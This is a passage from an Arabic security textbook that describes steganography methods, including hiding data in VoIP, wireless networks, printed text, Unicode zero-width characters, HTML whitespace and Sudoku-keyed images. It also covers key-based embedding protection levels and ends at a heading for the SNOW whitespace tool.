‫ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ‪-‬إﺧﻔﺎء اﻟرﺳﺎﺋل ﻓﻲ ﻣﺣﺎدﺛﺎت)‪. (Voice-over-IP‬‬
‫ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺷﺑﻛﺎت اﻟﻣﺣﻠﯾﺔ اﻟﻼﺳﻠﻛﯾﺔ ‪- WAN‬ﺑﺎﻻﺳﺗﻔﺎدة ﻣن اﻷﺳﺎﻟﯾب اﻟﺗﻲ ﯾﻣﻛن أن ﺗﻣﺎرس ﻟﻧﻘل اﻟﻣﻘﺎطﻊ اﻟﻣﺧﻔﯾﺔ ﻓﻲ‬
‫اﻟﺷﺑﻛﺎت اﻟﻼﺳﻠﻛﯾﺔ اﻟﻣﺣﻠﯾﺔ‪.‬‬
‫‪ -4‬ﺗﻘﻧﯾﺎت ﻣطﺑوﻋﺔ‬
‫اﺧرج اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟرﻗﻣﻲ ﻗد ﯾﻛون ﻓﻲ ﺷﻛل وﺛﺎﺋﻖ ﻣطﺑوﻋﺔ‪ .‬ﻗد ﺗﺷﻔر رﺳﺎﻟﺔ‪) ،‬ﻧص ﺻرﯾﺢ ‪ ،(plaintext‬أوﻻ‪ ،‬ﺑﺎﻟوﺳﺎﺋل اﻟﺗﻘﻠﯾدﯾﺔ‪،‬‬
‫ﻹﻧﺗﺎج اﻟﻧص اﻟﻣﺷﻔر ‪ .ciphertext‬ﺛم‪ ،‬ﯾﺗم ﺗﻌدﯾل ﻏطﺎء ﻏﯾر ﻣرﯾب )‪ (cover text‬ﺑطرﯾﻘﺔ ﻣﺎ‪ ،‬ﻻﺣﺗواء اﻟﻧص اﻟﻣﺷﻔر‪ ،‬ﻓﯾﻧﺗﺞ اﻟﻧص‬
‫اﻟﺣﺎوي ﻟﻠرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ )‪ .(stegotext‬اﻟﻧص اﻟﻣﺷﻔر اﻟذي ﺗﻧﺗﺟﮫ أﻛﺛر وﺳﺎﺋل إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟرﻗﻣﯾﺔ‪ ،‬ﻟﯾﺳت ﻗﺎﺑﻠﺔ ﻟﻠطﺑﺎﻋﺔ‪ .‬اﻷﺳﺎﻟﯾب‬
‫اﻟرﻗﻣﯾﺔ اﻟﺗﻘﻠﯾدﯾﺔ ﺗﻌﺗﻣد ﻋﻠﻰ اﺣداث ﺗﻐﯾﯾر اﻟﺿوﺿﺎء )‪(noise‬ﻓﻲ اﻟﻣﻠف اﻟﻘﻧﺎة ﻹﺧﻔﺎء اﻟرﺳﺎﻟﺔ‪ ،‬ﻋﻠﻰ ھذا اﻟﻧﺣو‪ ،‬ﯾﺟب أن ﯾرﺳل اﻟﻣﻠف إﻟﻰ ﻗﻧﺎة‬
‫اﻟﻣﺗﻠﻘﻲ دون إﺣداث ﺿوﺿﺎء إﺿﺎﻓﯾﺔ ﻧﺗﯾﺟﺔ اﻻرﺳﺎل‪ .‬اﻟطﺑﺎﻋﺔ اﻟﺗﻲ ﺗﻧﺗﺞ اﻟﻛﺛﯾر ﻣن اﻟﺿوﺿﺎء ﻓﻲ اﻟﻧص اﻟﻣﺷﻔر‪ ،‬ﺗﺟﻌل اﻟرﺳﺎﻟﺔ‪ ،‬ﻋﻣوﻣﺎ‪ ،‬ﻏﯾر‬
‫ﻗﺎﺑﻠﺔ ﻟﻼﺳﺗرداد‪ .‬ھﻧﺎك ﺗﻘﻧﯾﺎت اﻟﺗﻲ ﺗﺗﻧﺎول ھذا اﻟﻘﯾد‪ ،‬ﻣﺛﺎل ھو )‪.(ASCII Art Steganography‬‬
‫‪ -5‬اﻟﻧص اﻟرﻗﻣﻲ‬
‫ﯾﺳﺗﺧدم ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪-‬ﯾوﻧﯾﻛود ﺣروﻓﺎ ﺗﺷﺑﮫ ﻣﺟﻣوﻋﺔ ‪ ASCII‬اﻟﻣﻌﺗﺎدة ﻟﺗﺑدو طﺑﯾﻌﯾﺔ‪ ،‬ﻓﻲ ﺣﯾن أﻧﮭﺎ ﺗﺣﻣل ﺑﺗﺎت إﺿﺎﻓﯾﺔ ﻣن اﻟﻣﻌﻠوﻣﺎت‪ .‬إذا‬
‫ﻋرض اﻟﻧص ﺑﺷﻛل ﺻﺣﯾﺢ‪ ،‬ﻓﻠن ﯾﻛون ھﻧﺎك ﻓرق ﺑﺻري ﻋن اﻟﻧص اﻟﻌﺎدي‪ .‬وﻣﻊ ذﻟك‪ ،‬ﺑﻌض اﻷﻧظﻣﺔ‪ ،‬ﻗد ﺗﻌرض اﻟﺧطوط ﺑﺷﻛل ﻣﺧﺗﻠف‪،‬‬
‫وﺳﯾﺗم رﺻد اﻟﻣﻌﻠوﻣﺎت اﻻﺿﺎﻓﯾﺔ ﺑﺳﮭوﻟﺔ‪ .‬ﻣن ﺟﮭﺔ أﺧرى‪ ،‬اﻟﺣروف اﻟﻣﺧﻔﯾﺔ )ﻣﺛﻼ‪ ،‬ﺣروف اﻟﺳﯾطرة(‪ ،‬اﻻﺳﺗﺧدام اﻟﻣﺗﻛرر ﻟﻠﻌﻼﻣﺎت )ﻧوع‬
‫اﻟﺣروف اﻟﻐﺎﻣﻖ‪ ،‬اﻟﻣﺳطر‪ ،‬واﻟﻣﺎﺋل‪ ،‬اﻟﺗﺷﻛﯾل ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﺣروف اﻟﻌرﺑﯾﺔ(‪ ،‬ﯾﻣﻛن ان ﺗﺿﯾف ﻣﻌﻠوﻣﺎت ﺧﻔﯾﺔ ﻓﻲ ﻣﺗن اﻟﻧص‪ ،‬ﺑدون ان ﺗﺑدو‬
‫واﺿﺣﺔ ﺑﺻرﯾﺎ ﻋﻧد ﻋرﺿﮭﺎ‪ ،‬وﻟﻛن ﯾﻣﻛن اﻛﺗﺷﺎﻓﮭﺎ ﻋﻧد اﻻطﻼع ﻋﻠﻰ ﺷﻔرة ﻣﺻدر اﻟوﺛﯾﻘﺔ‪.‬‬
‫ﯾﻣﻛن ان ﺗﺣﺗوي ﺻﻔﺣﺎت )‪ ،(HTML‬ﻋﻠﻰ ﺗﻌﻠﯾﻣﺎت ﺑرﻣﺟﯾﺔ ذات ﻣﺳﺎﻓﺎت ﻓﺎرﻏﺔ )‪ (blank spaces‬إﺿﺎﻓﯾﺔ وﻋﻼﻣﺎت اﻟﺗﺑوﯾب ﻓﻲ ﻧﮭﺎﯾﺔ‬
‫اﻷﺳطر‪ ،‬وﻛذﻟك أﻟوان ﻣﺧﺗﻠﻔﺔ‪ ،‬واﻟﺧطوط واﻷﺣﺟﺎم‪ ،‬واﻟﺗﻲ ﻟن ﺗﻛون ﻣرﺋﯾﺔ ﻋﻧد ﻋرﺿﮭﺎ‪ .‬وھﻧﺎك ﻣﺛﺎل أﻛﺛر ﺑﺳﺎطﺔ ھو ﻧص أﺑﯾض ﻋﻠﻰ ﺧﻠﻔﯾﺔ‬
‫ﺑﯾﺿﺎء‪ ،‬واﻟﺗﻲ ﯾﻣﻛن أن ﯾﻛﺷف ﻋﻧد ﺑﺗﺣدﯾده‪"selecting”.‬‬
‫أﺣد ھذه اﻷﺳﺎﻟﯾب ﯾﺳﺗﻧد إﻟﻰ اﺳﺗﺧدام ﺣروف ﯾوﻧﯾﻛود اﻟﻐﯾر ﻗﺎﺑﻠﮫ ﻟﻠطﺑﺎﻋﯾﺔ)‪، ((ZWJ)zero-width-joiner)، (non-printing‬‬
‫)‪ .(ZWNJ) (zero-width non-joiner‬وﺗﺳﺗﺧدم ھذه اﻷﺣرف ﻟوﺻل وﻓﺻل اﻟﺣروف ﻓﻲ اﻟﻠﻐﺔ اﻟﻌرﺑﯾﺔ‪ ،‬وﻟﻛن ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻓﻲ‬
‫اﻟﺣروف اﻟﮭﺟﺎﺋﯾﺔ اﻟروﻣﺎﻧﯾﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻷﻧﮭﺎ ﻻ ﻣﻌﻧﻰ ﻟﮭﺎ ﻓﻲ اﻷﺑﺟدﯾﺔ اﻟﻼﺗﯾﻧﯾﺔ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﻻ ﯾﺗم ﻋرﺿﮭﺎ‪.‬‬
‫‪ -6‬اﺳﺗﺧدام أﻟﻐﺎز ﺳودوﻛو‬
‫ﻓن إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﻓﻲ ﺻورة ﺑﺎﺳﺗﺧدام أﻟﻐﺎز ﺳودوﻛو‪ ،”Sudoku puzzle"،‬واﻟذي ﯾﺳﺗﺧدم ﻛﻣﻔﺗﺎح ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت داﺧل ﺻورة‪ .‬إﺧﻔﺎء‬
‫اﻟﻣﻌﻠوﻣﺎت ﺑﺎﺳﺗﺧدام اﻷﻟﻐﺎز ﺳودوﻛو ﯾﻣﺗﻠك اﻟﻌدﯾد ﻣن اﻟﻣﻔﺎﺗﯾﺢ ﺑﻘدر اﻟﺣﻠول اﻟﻣﻣﻛﻧﺔ ﻟﻠﻐز ﺳودوﻛو‪ ،‬واﻟذي ھو ‪ .1021 × 6.71‬وھذا ﯾﻌﺎدل‬
‫ﺣواﻟﻲ ‪ 70‬ﺑت‪ ،‬ﻣﻣﺎ ﯾﺟﻌﻠﮭﺎ أﻗوى ﺑﻛﺛﯾر ﻣن طرﯾﻘﺔ ‪ DES‬اﻟذي ﯾﺳﺗﺧدم ﻣﻔﺗﺎح ‪ 56‬ﺑت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪461‬‬

‫‪HOW STEGANOGRAPHY WORKS‬‬

‫ﺗﺷﻔﯾر ‪ Steganography‬ﯾﺳﺗﺧدم اﻷﻣﺎﻛن اﻷﻗل أھﻣﯾﺔ ﻣن اﻟﻣﺣﺗوى اﻟرﻗﻣﻲ‪ ،‬وﯾﻘﺣم اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ ﻓﻲ ﻣﻛﺎﻧﮭﺎ‪ .‬ﯾﺗم ذﻟك ﻋﺑر ﻣﻠﻔﺎت اﻟﺻور‬
‫واﻟﻣﻠﻔﺎت اﻟﻧﺻﯾﺔ واﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ وأي ﺑﯾﺎﻧﺎت رﻗﻣﯾﺔ‪ .‬اﻟﻘﺻد ﻣن ھذه اﻟﻌﻣﻠﯾﺔ ھو ﺗوﻓﯾر اﻟﺳرﯾﺔ‪ .‬ﻣﻊ ﺗﻘدم ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ ،‬اﻟرﺳﺎﺋل اﻟﻣﺧﻔﯾﺔ‬
‫داﺧل اﻟﺻور اﻟرﻗﻣﯾﺔ أﺻﺑﺣت اﻟﻧﻣوذج اﻷﻛﺛر ﺷﯾوﻋﺎ ً واﻟﻔﻌﺎل ﻟﻠﻐﺎﯾﺔ ﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪ .‬ﯾﺗم ﺗﺧزﯾن اﻟﺻور ﻓﻲ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻛﻣﺟﻣوﻋﺔ‬
‫ﻣن وﺣدات اﻟﺑﻛﺳل‪ ،‬ﺑﻣﻘدار ﺑﻛﺳل واﺣد ﺑﻧﺣو ﻣن ‪ 8‬إﻟﻰ ‪ 24‬ﺑت‪ .‬ﯾﺗم ﺗﺧزﯾن ھذه اﻟﻣﺟﻣوﻋﺔ ﻣن اﻟﺑﻛﺳل ﻓﻲ ﻣﻠف ﺻورة وﻓﻘﺎ ﻷي واﺣد ﻣن‬
‫ﻋدد ﻣن اﻷﺷﻛﺎل‪ .‬ھﻧﺎك اﺛﻧﯾن ﻣن اﻟﻣﻠﻔﺎت اﻟذي ﺳوف ﻧﺣﺗﺎﺟﮭم ﻓﻲ إﺧﻔﺎء رﺳﺎﻟﺔ داﺧل ﻣﻠف اﻟﺻورة‪.‬‬
‫ھذﯾن اﻟﻣﻠﻔﯾن ھﻣﺎ‪:‬‬
‫‪ .1‬اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﺻورة اﻟﺗﻲ ﻣن اﻟﻣﻔﺗرض أن ﺗوﺿﻊ اﻟرﺳﺎﻟﺔ ﻓﯾﮫ‪.‬‬
‫‪ .2‬اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟرﺳﺎﻟﺔ ﻧﻔﺳﮭﺎ‪.‬‬

‫‪Types of Steganography‬‬

‫‪ Steganography‬ھو ﻓن وﻋﻠم ﻛﺗﺎﺑﺔ اﻟرﺳﺎﺋل اﻟﻣﺧﻔﯾﺔ ﻓﻲ ﻣﺛل ھذه اﻟطرﯾﻘﺔ ﻻ أﺣد ﻏﯾر اﻟﻣﺗﻠﻘﻲ ﯾﻌرف ﻣن وﺟود اﻟرﺳﺎﻟﺔ‪ .‬ﻣﻊ زﯾﺎدة‬
‫اﻻﺳﺗﺧداﻣﺎت اﻟﻣﺗزاﯾدة ﻟﺻﯾﻎ اﻟﻣﻠﻔﺎت اﻻﻟﻛﺗروﻧﯾﺔ ﻣﻊ اﻟﺗﻛﻧوﻟوﺟﯾﺎت اﻟﺟدﯾدة أﺻﺑﺢ ﻣن اﻟﻣﻣﻛن إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت‪ .‬إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻷﺳﺎﺳﯾﺔ ﯾﻣﻛن‬
‫ﺗﻘﺳﯾﻣﮭﺎ إﻟﻰ ﻣﺟﺎﻟﯾن‪ :‬إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت )‪ (data hiding‬وأﻧﺷﺎء اﻟوﺛﺎﺋﻖ )‪ .(document making‬أﻧﺷﺎء اﻟوﺛﺎﺋﻖ )‪(document making‬‬
‫ﯾﺗﻌﺎﻣل ﻣﻊ اﻟﺣﻣﺎﯾﺔ ﺿد اﻹزاﻟﺔ‪/‬اﻟﻣﺳﺢ‪ .‬وﺗﻧﻘﺳم ھﻲ اﻷﺧرى اﻟﻰ اﻟﻌﻼﻣﺎت اﻟﻣﺎﺋﯾﺔ )‪ (watermarking‬واﻟﺑﺻﻣﺎت )‪. (Fingerprinting‬‬
‫ﯾﺗم ﺳرد أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن ‪ Steganography‬ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪462‬‬

‫ﻣﺧططﺎت أﻣن ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت "‪"Data Embedding Security Schemes‬‬


‫ﻓﻲ ﻣﻌظم اﻟﺣﺎﻻت‪ ،‬ﯾؤﺳس اﺧﺗﯾﺎر ﺧوارزﻣﯾﺔ اﻟﺗﺿﻣﯾن ﻋﻠﻰ ﻧﺗﺎﺋﺞ ﺗﺣﻠﯾل ﻣﺗﺎﻧﺔ ﻗﻧﺎة اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ“ ‪. "channel robustness analysis‬‬
‫واﺣدة ﻣن اﻟﻣﻧﺎطﻖ اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﺗﺣﺳﯾن ﻣﺗﺎﻧﺔ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ھو اﺳﺗﺧدام ﻣﺧطط ﻣﻔﺗﺎﺣﻲ‪ ،“ key scheme"،‬ﻟﺗﺿﻣﯾن اﻟرﺳﺎﺋل‪ .‬ﻣﺧﺗﻠف‬
‫ﻣﺧططﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟرﺋﯾﺳﯾﺔ ﻟدﯾﮭﺎ ﻣﺳﺗوﯾﺎت ﻣﺧﺗﻠﻔﺔ ﻣن اﻟﺣﻣﺎﯾﺔ‪ .‬ﻣﺻطﻠﺢ "ﻣﺧطط ﻣﻔﺗﺎﺣﻲ" ﯾﻌﻧﻲ إﺟراﺋﯾﺔ ﺗوﺿﺢ ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ﻧظﺎم‬
‫ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻣﻔﺗﺎﺣﻲ‪ ،“ key steganographic system"،‬ﻋﻠﻰ أﺳﺎس ﻧطﺎق اﺳﺗﺧداﻣﮫ‪ .‬ﻋﻧدﻣﺎ ﺗﺗم زﯾﺎدة ﻣﺗﺎﻧﺔ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ ،‬ﯾﻧﺧﻔض‬
‫ﻋرض اﻟﻧطﺎق اﻟﺗرددي‪ ،‬ﻟﻧظﺎم اﻟﺗﺿﻣﯾن ﻛﻠﮫ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ ﻓﺈن ﻣﮭﻣﺔ اﺧﺗﯾﺎر ﻣﺧطط ﻟﺗﺣﻘﯾﻖ اﻟﻘﯾم اﻟﻣﺛﻠﻰ ﻟﻠﻧظﺎم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻟﯾﺳت ھﯾﻧﺔ‪ .‬ﯾﻣﻛن‬
‫ﺗﺿﻣﯾن اﻟرﺳﺎﺋل ﻓﻲ اﻟﻧظﺎم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻣن دون اﺳﺗﺧدام ﻣﻔﺗﺎح أو ﻣﻊ اﺳﺗﺧدام ﻣﻔﺗﺎح‪ .‬ﻟﺗﺣﺳﯾن ﻣﺗﺎﻧﺔ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ ،‬ﯾﻣﻛن اﺳﺗﺧدام‬
‫ﻣﻔﺗﺎح ﻛﺧﯾﺎر ﻟﻠﺗﺣﻘﻖ‪ .‬وﯾﻣﻛن ان ﯾﻛون ﻟﮫ ﺗﺄﺛﯾر ﻋﻠﻰ ﺗوزﯾﻊ ﺑﺗﺎت ﻣن اﻟرﺳﺎﻟﺔ داﺧل ﺣﺎوﯾﺔ‪ ،‬وﻛذﻟك ﻟﮫ ﺗﺄﺛﯾر ﻋﻠﻰ إﺟراﺋﯾﺔ ﺗﺷﻛﯾل ﺗﺳﻠﺳل اﻟﺑﺗﺎت‬
‫اﻟرﺳﺎﻟﺔ اﻟﻣﺿﻣﻧﺔ‪ .‬ﯾﺗم ﺗﺣدﯾد اﻟﻣﺳﺗوى اﻷول ﻣن اﻟﺣﻣﺎﯾﺔ ﻋن طرﯾﻖ اﺧﺗﯾﺎر ﻣن ﺧوارزﻣﯾﺔ اﻟﺗﺿﻣﯾن ﻓﻘط‪ .‬ﻗد ﯾﻛون ھذا اﻻﺧﺗﯾﺎر ھو ﺧوارزﻣﯾﺔ‬
‫ﺗﻌدﯾل )اﻟﺑت اﻷﻗل أھﻣﯾﺔ()‪ ، (LSB) (least significant bit‬أو ﺧوارزﻣﯾﺎت ﺗﻌدﯾل ﺧﺻﺎﺋص اﻟﺣﺎوﯾﺔ‪ ،‬اﻟﻣﻛﺎﻧﯾﺔ‪-‬اﻟزﻣﺎﻧﯾﺔ‪،(spatial-temporal) ،‬‬
‫أو اﻟﺗردد‪ .‬ﯾﺗم ﺗﻘدﯾم اﻟﻣﺳﺗوى اﻷول ﻣن اﻟﺣﻣﺎﯾﺔ ﻓﻲ أي ﻗﻧﺎة ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ .‬ﯾﻣﻛن ﺗﻣﺛﯾل ﻧظﺎم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ‬
‫ﺷﻛل ﻣﺧطط ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻷول‪ .‬وﺗﺳﺗﺧدم ﻓﯾﮫ اﻟﺗرﻣﯾزات اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬ﻣﻠف اﻟﺣﺎوﯾﺔ )‪(C‬‬
‫‪ -‬ﻓﺿﺎء ﻗﻧﺎة اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ )ﺗردد أو ‪ /‬وﺳﻌﺔ ﺟزء اﻟﺣﺎوﯾﺔ‪،‬‬
‫اﻟﻣﺗﺎح ﻟﻠﺗﻌدﯾل اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ وﻧﻘل إﺷﺎرات اﻟرﺳﺎﻟﺔ()‪(F‬‬
‫‪ -‬ﻧظﺎم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ )‪(SC‬‬
‫‪ -‬اﻟرﺳﺎﻟﺔ اﻟﻣطﻠوب ﺗﺿﻣﯾﻧﮭﺎ )‪(m‬‬
‫‪ -‬أﺳﻠوب اﻟﺗﺿﻣﯾن )‪(E‬‬
‫‪ -‬ﻣﻠف اﻟﺣﺎوﯾﺔ اﻟﻣﻌدل )^‪(c‬‬
‫ﯾﺗﻣﯾز ﻣﺳﺗوى ﺣﻣﺎﯾﺔ اﻟﻧظﺎم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺛﺎﻧﻲ‪ ،‬ﻓﺿﻼ ﻋن ﺟﻣﯾﻊ ﻣﺳﺗوﯾﺎت اﻟﺣﻣﺎﯾﺔ ﻓﻲ اﻟﻣراﺗب اﻟﻌﻠﯾﺎ‪ ،‬ﺑﺎﺳﺗﺧدام ﻣﻔﺗﺎح )ﻛﻠﻣﺔ اﻟﺳر( ﺧﻼل‬
‫اﻟﺗﻌدﯾل اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ .‬ﻣﺛﺎل ﻋﻠﻰ ﻣﺧطط ﻣﻔﺗﺎح ﺑﺳﯾط‪ ،‬اﻟذي ﯾوﻓر اﻟﻣﺳﺗوى اﻟﺛﺎﻧﻲ ﻣن اﻟﺣﻣﺎﯾﺔ‪ ،‬ھو أن ﺗﻛﺗب ﻛﻠﻣﺔ اﻟﻣرور ﻏﯾر اﻟﻣﻌدﻟﺔ أو‬
‫اﻟﻣﻌدﻟﺔ‪ ،‬ﻓﻲ أﻋﻠﻰ أو أﺳﻔل اﻟرﺳﺎﻟﺔ‪ ،‬أو ﺗوزﯾﻊ ﻋﻼﻣﺔ ﻛﻠﻣﺔ اﻟﻣرور ﻋﻠﻰ طول ﻗﻧﺎة اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ .‬ﻣﺛل ﻣﺧططﺎت اﻟﻣﻔﺗﺎح ھذه ﻻ ﺗؤﺛر ﻓﻲ‬
‫ﺗوزﯾﻊ اﻟرﺳﺎﺋل ﺧﻼل اﻟﺣﺎوﯾﺔ وﻻ ﺗﺳﺗﺧدم ﻣﻌﺎﻟﺟﺔ رﺳﺎﻟﺔ وﻓﻘﺎ ﻟﻠﻣﻔﺗﺎح اﻟﻣﻌرف )اﻧظر اﻟﺷﻛل ﻣﺧطط ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻟﺛﺎﻧﻲ(‪ .‬ﯾﺳﺗﺧدم ﻣﺛل ھذا‬
‫اﻟﻧوع ﻣن أﻧظﻣﺔ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻓﻲ ﻣﮭﺎم‪ ،‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إﺿﺎﻓﺔ اﻟﺗوﻗﯾﻊ اﻟرﻗﻣﻲ ﻹﺛﺑﺎت ﺣﻘوق اﻟطﺑﻊ واﻟﻧﺷر‪ .‬ﻟن ﯾﺗﻐﯾر أداء ﺗﺿﻣﯾن‬
‫اﻟﺑﯾﺎﻧﺎت ﺑﺎﻟﻣﻘﺎرﻧﺔ ﻣﻊ اﺳﺗﺧدام أﺳرع أﺳﻠوب ﻣن ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻷول‪.‬‬
‫ﻗﻧوات ﺑﯾﺎﻧﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺗﻲ ﺗﺳﺗﺧدم ﺗوزﯾﻊ رﺳﺎﻟﺔ‪ ،‬ﯾﺳﺗﻧد إﻟﻰ ﻣﺧططﺎت ﻣﻔﺗﺎح‪ ،‬ﺧﻼل اﻟﺣﺎوﯾﺔ‪ ،‬و‪/‬أو ﯾﻌﺎﻟﺞ رﺳﺎﻟﺔ ﻣﺿﻣﻧﺔ ﻹﺧﻔﺎء‬
‫اﻟﺑﯾﺎﻧﺎت ھﻲ أﻛﺛر أﻣﻧﺎ‪ .‬ﻋﻧدﻣﺎ ﯾﺗم اﺳﺗﺧدام ﻧظﺎم ﻣﻔﺗﺎح ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻟﺛﺎﻟث‪ ،‬ﻓﺄﻧﮫ ﯾؤﺛر ﻋﻠﻰ ﺗوزﯾﻊ اﻟرﺳﺎﻟﺔ ﺧﻼل اﻟﺣﺎوﯾﺔ‪) .‬اﻧظر اﻟﺷﻛل‬
‫ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻟﺛﺎﻟث( ﺣﯾث‪:‬‬
‫‪ - F(P, L) -‬داﻟﺔ ﺗوزﯾﻊ ﻟرﺳﺎﻟﺔ داﺧل ﺣﺎوﯾﺔ‪.‬‬
‫‪ - P -‬اﻟﺣد اﻷدﻧﻰ ﻟﻌدد اﻟﻌﯾﻧﺎت اﻟﺣﺎوﯾﺔ اﻟﻼزﻣﺔ ﻟﺗﺿﻣﯾن ﻋﯾﻧﺔ رﺳﺎﻟﺔ واﺣدة‪.‬‬
‫‪ - L -‬ﺧطوة ﺗوزﯾﻊ اﻟرﺳﺎﻟﺔ داﺧل ﺣﺎوﯾﺔ‪.‬‬
‫وﻓﻘﺎ ﻟذﻟك‪ ،‬ﻓﺈن أداء ﻣﻌﺎﻟﺟﺔ اﻟﺣﺎوﯾﺎت ﺗﻛون أﻗل ﻣﻣﺎ ﻛﺎﻧت ﻋﻠﯾﮫ ﻓﻲ ﺣﺎﻟﺔ ﻣﺧططﺎت اﻟﻣﻔﺗﺎح اﻷول واﻟﺛﺎﻧﻲ‪ .‬ﻣﻊ اﻷﺧذ ﺑﻌﯾن اﻻﻋﺗﺑﺎر أن‪، P ≥ L‬‬
‫أﺑﺳط ﺗﻣﺛﯾل ﻟداﻟﺔ) ‪ ،F(P, L‬ﯾﻣﻛن أن ﺗﻛون ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪F(P, L) = cycle*L + step*P‬‬
‫ﺣﯾث )‪ (cycle‬دورة ھو رﻗم اﻟﻣﻘطﻊ اﻟﺣﺎﻟﻲ‪ ، L‬وﺧطوة )‪ (step‬ھو رﻗم ﻋﯾﻧﺔ اﻟرﺳﺎﻟﺔ اﻟﻣﺿﻣﻧﺔ‪.‬‬
‫اﻟﻔرق ﺑﯾن ﻣﺧطط ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻟراﺑﻊ واﻟﺛﺎﻟث ھو أﻧﮫ‪ ،‬ﺗﺳﺗﺧدم وظﯾﻔﺗﻲ ﺗوزﯾﻊ رﺳﺎﻟﺔ ﻓﻲ ﻧظﺎم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ ،‬داﺧل ﺣﺎوﯾﺔ‪ .‬اﻷول‬
‫ﻣﺳؤول ﻋن اﺧﺗﯾﺎر ﻋﯾﻧﺎت رﺳﺎﻟﺔ وﻓﻘﺎ ﻟداﻟﺔ ﻣﺎ ‪, G(Q, N),‬واﻟوظﯾﻔﺔ اﻟﺛﺎﻧﯾﺔ ‪ F(P, L),‬ﻣﺳؤوﻟﺔ ﻋن اﺧﺗﯾﺎر ﻣوﻗﻊ إﺧﻔﺎء ﻋﯾﻧﺔ رﺳﺎﻟﺔ‪ .‬ھﻧﺎ ‪Q‬‬
‫ﺣﺟم ﻛﺗﻠﺔ اﻟرﺳﺎﻟﺔ اﻟﻣطﻠوب إدراﺟﮭﺎ؛‪ N‬ﺣﺟم )ﺑﺎﻟﺑت( ﻣن ﻋﯾﻧﺔ واﺣدة ﻣن ﻣﻠف اﻟرﺳﺎﻟﺔ )اﻧظر اﻟﺷﻛل ﻣﺧطط ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻟراﺑﻊ(‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪463‬‬

‫واﺳﺗﻧﺎدا إﻟﻰ اﻟﻣﻧﺎﻗﺷﺔ اﻟواردة أﻋﻼه ﻓﻣن اﻟﻣﻣﻛن ﺗﻌرﯾف ﺟدول ﺗﺻﻧﯾف ﻣﺧططﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﻣﻔﺗﺎﺣﯾﺔ‪:‬‬

‫‪Whitespace Steganography Tool: SNOW‬‬

